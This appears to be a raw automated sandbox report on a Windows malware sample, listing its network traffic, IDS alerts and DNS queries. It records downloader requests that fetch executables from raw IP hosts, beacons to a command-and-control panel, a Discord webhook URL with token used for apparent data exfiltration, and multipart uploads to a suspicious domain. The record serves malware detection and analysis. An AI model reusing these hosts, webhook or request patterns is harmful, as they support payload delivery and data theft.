Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 10 Dec 2024 10:11:54 GMTContent-Type: application/octet-streamContent-Length: 1966080Last-Modified: Tue, 10 Dec 2024 08:03:38 GMTConnection: keep-aliveETag: "6757f5da-1e0000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 21 4a f8 9d 40 24 ab 9d 40 24 ab 9d 40 24 ab 83 12 a0 ab 81 40 24 ab 83 12 b1 ab 89 40 24 ab 83 12 a7 ab c5 40 24 ab ba 86 5f ab 94 40 24 ab 9d 40 25 ab f6 40 24 ab 83 12 ae ab 9c 40 24 ab 83 12 b0 ab 9c 40 24 ab 83 12 b5 ab 9c 40 24 ab 52 69 63 68 9d 40 24 ab 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 0c de dd 64 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 d4 02 00 00 b0 01 00 00 00 00 00 00 b0 86 00 00 10 00 00 00 f0 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 e0 86 00 00 04 00 00 86 5b 1e 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 5a 10 42 00 6e 00 00 00 00 e0 40 00 68 21 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c4 ef 85 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 d0 40 00 00 10 00 00 00 54 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 68 21 01 00 00 e0 40 00 00 94 00 00 00 64 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 10 42 00 00 02 00 00 00 f8 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 a0 29 00 00 20 42 00 00 02 00 00 00 fa 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 77 64 6d 66 6b 68 77 64 00 e0 1a 00 00 c0 6b 00 00 de 1a 00 00 fc 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 64 78 64 65 62 67 72 65 00 10 00 00 00 a0 86 00 00 04 00 00 00 da 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 b0 86 00 00 22 00 00 00 de 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Source: global traffic	HTTP traffic detected: GET /geolocation/wifi?v=1.1&bssid=00:50:56:a7:21:15 HTTP/1.1Host: api.mylnikov.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /api/webhooks/1016614786533969920/fMJOOjA1pZqjV8_s0JC86KN9Fa0FeGPEHaEak8WTADC18s5Xnk3vl2YBdVD37L0qTWnM?wait=true HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: discord.comContent-Length: 2226Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 42 37 34 42 30 35 46 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12B74B05F82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: GET /files/1521297942/H3tyh96.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 33 36 37 35 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1013675001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /luma/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 33 36 37 36 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1013676001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 33 36 37 37 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1013677001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /well/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CGDGHCBGDHJJKECAECBAHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 47 44 47 48 43 42 47 44 48 4a 4a 4b 45 43 41 45 43 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 43 35 46 31 34 42 35 41 44 37 36 32 37 37 38 39 30 34 39 32 36 0d 0a 2d 2d 2d 2d 2d 2d 43 47 44 47 48 43 42 47 44 48 4a 4a 4b 45 43 41 45 43 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 74 6f 6b 0d 0a 2d 2d 2d 2d 2d 2d 43 47 44 47 48 43 42 47 44 48 4a 4a 4b 45 43 41 45 43 42 41 2d 2d 0d 0a Data Ascii: ------CGDGHCBGDHJJKECAECBAContent-Disposition: form-data; name="hwid"AC5F14B5AD762778904926------CGDGHCBGDHJJKECAECBAContent-Disposition: form-data; name="build"stok------CGDGHCBGDHJJKECAECBA--
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 33 36 37 38 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1013678001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /off/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: icanhazip.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 33 36 37 39 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1013679001&unit=246122658369
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BAKJKFHCAEGDHIDGDHDAHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 41 4b 4a 4b 46 48 43 41 45 47 44 48 49 44 47 44 48 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 43 35 46 31 34 42 35 41 44 37 36 32 37 37 38 39 30 34 39 32 36 0d 0a 2d 2d 2d 2d 2d 2d 42 41 4b 4a 4b 46 48 43 41 45 47 44 48 49 44 47 44 48 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 74 6f 6b 0d 0a 2d 2d 2d 2d 2d 2d 42 41 4b 4a 4b 46 48 43 41 45 47 44 48 49 44 47 44 48 44 41 2d 2d 0d 0a Data Ascii: ------BAKJKFHCAEGDHIDGDHDAContent-Disposition: form-data; name="hwid"AC5F14B5AD762778904926------BAKJKFHCAEGDHIDGDHDAContent-Disposition: form-data; name="build"stok------BAKJKFHCAEGDHIDGDHDA--
Source: global traffic	HTTP traffic detected: GET /files/unique2/random.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: icanhazip.com
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 33 36 38 30 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1013680001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EGDGIIJJECFIDHJJKKFCHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 47 44 47 49 49 4a 4a 45 43 46 49 44 48 4a 4a 4b 4b 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 43 35 46 31 34 42 35 41 44 37 36 32 37 37 38 39 30 34 39 32 36 0d 0a 2d 2d 2d 2d 2d 2d 45 47 44 47 49 49 4a 4a 45 43 46 49 44 48 4a 4a 4b 4b 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 74 6f 6b 0d 0a 2d 2d 2d 2d 2d 2d 45 47 44 47 49 49 4a 4a 45 43 46 49 44 48 4a 4a 4b 4b 46 43 2d 2d 0d 0a Data Ascii: ------EGDGIIJJECFIDHJJKKFCContent-Disposition: form-data; name="hwid"AC5F14B5AD762778904926------EGDGIIJJECFIDHJJKKFCContent-Disposition: form-data; name="build"stok------EGDGIIJJECFIDHJJKKFC--

Source: Joe Sandbox View	IP Address: 185.215.113.43 185.215.113.43
Source: Joe Sandbox View	IP Address: 208.95.112.1 208.95.112.1

Source: Joe Sandbox View	ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
Source: Joe Sandbox View	ASN Name: IS-AS-1US IS-AS-1US

Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View	JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: unknown	DNS query: name: icanhazip.com
Source: unknown	DNS query: name: ip-api.com

Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49828 -> 31.41.244.11:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49850 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49867 -> 104.21.32.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49881 -> 104.21.32.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49880 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49912 -> 104.21.32.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49914 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49935 -> 104.21.32.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49938 -> 104.21.32.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49927 -> 104.21.32.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49937 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49948 -> 104.21.32.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49950 -> 104.21.32.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49994 -> 104.21.32.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49951 -> 104.16.185.241:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49987 -> 104.21.32.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49996 -> 31.41.244.11:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50007 -> 104.21.32.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50014 -> 104.21.32.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50028 -> 104.21.32.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50095 -> 104.21.32.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50093 -> 104.21.32.1:443

Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: atten-supporse.biz
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 53Host: atten-supporse.biz
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=5V1MRP6SUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12781Host: atten-supporse.biz
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=3FTCUR61XWUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15035Host: atten-supporse.biz
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: atten-supporse.biz
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=37MTKWU1NUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20519Host: atten-supporse.biz
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 53Host: atten-supporse.biz
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=T6JH0R4Y7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1263Host: atten-supporse.biz
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=IZZIWX71TCZPZB622JOUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12847Host: atten-supporse.biz
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=OIDIPR2CNHCI9JQBKUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 48650Host: atten-supporse.biz
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=CMT2QS9I22AA9EWEYCUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15083Host: atten-supporse.biz
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=TCQ9G2D00User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20519Host: atten-supporse.biz
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: atten-supporse.biz
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 53Host: atten-supporse.biz

Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_0038E0C0 recv,recv,recv,recv,

0_2_0038E0C0

Source: global traffic	HTTP traffic detected: GET /geolocation/wifi?v=1.1&bssid=00:50:56:a7:21:15 HTTP/1.1Host: api.mylnikov.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/1521297942/H3tyh96.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic	HTTP traffic detected: GET /luma/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET /well/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /off/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: icanhazip.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /files/unique2/random.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: icanhazip.com
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache

Source: global traffic	DNS traffic detected: DNS query: atten-supporse.biz
Source: global traffic	DNS traffic detected: DNS query: icanhazip.com
Source: global traffic	DNS traffic detected: DNS query: 246.229.1.0.in-addr.arpa
Source: global traffic	DNS traffic detected: DNS query: ip-api.com
Source: global traffic	DNS traffic detected: DNS query: prod.classify-client.prod.webservices.mozgcp.net
Source: global traffic	DNS traffic detected: DNS query: detectportal.firefox.com
Source: global traffic	DNS traffic detected: DNS query: youtube.com
Source: global traffic	DNS traffic detected: DNS query: contile.services.mozilla.com
Source: global traffic	DNS traffic detected: DNS query: spocs.getpocket.com
Source: global traffic	DNS traffic detected: DNS query: content-signature-2.cdn.mozilla.net
Source: global traffic	DNS traffic detected: DNS query: shavar.services.mozilla.com
Source: global traffic	DNS traffic detected: DNS query: firefox.settings.services.mozilla.com
Source: global traffic	DNS traffic detected: DNS query: push.services.mozilla.com
Source: global traffic	DNS traffic detected: DNS query: prod.detectportal.prod.cloudops.mozgcp.net
Source: global traffic	DNS traffic detected: DNS query: prod.ads.prod.webservices.mozgcp.net
Source: global traffic	DNS traffic detected: DNS query: prod.balrog.prod.cloudops.mozgcp.net
Source: global traffic	DNS traffic detected: DNS query: prod.content-signature-chains.prod.webservices.mozgcp.net
Source: global traffic	DNS traffic detected: DNS query: example.org
Source: global traffic	DNS traffic detected: DNS query: ipv4only.arpa
Source: global traffic	DNS traffic detected: DNS query: prod.remote-settings.prod.webservices.mozgcp.net
Source: global traffic	DNS traffic detected: DNS query: telemetry-incoming.r53-2.services.mozilla.com
Source: global traffic	DNS traffic detected: DNS query: www.youtube.com
Source: global traffic	DNS traffic detected: DNS query: www.facebook.com
Source: global traffic	DNS traffic detected: DNS query: www.wikipedia.org
Source: global traffic	DNS traffic detected: DNS query: star-mini.c10r.facebook.com
Source: global traffic	DNS traffic detected: DNS query: youtube-ui.l.google.com
Source: global traffic	DNS traffic detected: DNS query: dyna.wikimedia.org
Source: global traffic	DNS traffic detected: DNS query: www.reddit.com
Source: global traffic	DNS traffic detected: DNS query: twitter.com
Source: global traffic	DNS traffic detected: DNS query: reddit.map.fastly.net
